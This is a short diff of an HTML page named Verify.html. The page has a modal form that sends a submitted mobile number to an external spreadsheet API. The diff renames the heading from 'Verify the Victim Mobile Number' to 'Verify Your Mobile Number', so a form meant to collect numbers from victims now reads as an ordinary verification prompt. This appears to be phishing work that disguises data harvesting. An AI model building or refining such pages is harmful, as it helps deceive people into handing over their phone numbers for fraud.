--- a/Verify.html
+++ b/Verify.html
@@ -137,7 +137,7 @@
         title="Close Modal">&times;</span>
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
         <div class="container">
-            <h1> Verify the Victim Mobile Number </h1>
+            <h1> Verify Your Mobile Number </h1>
             <p> Verify its you </p>
             <hr>
             <label for="number"><b>Your Mobile Number </b></label>
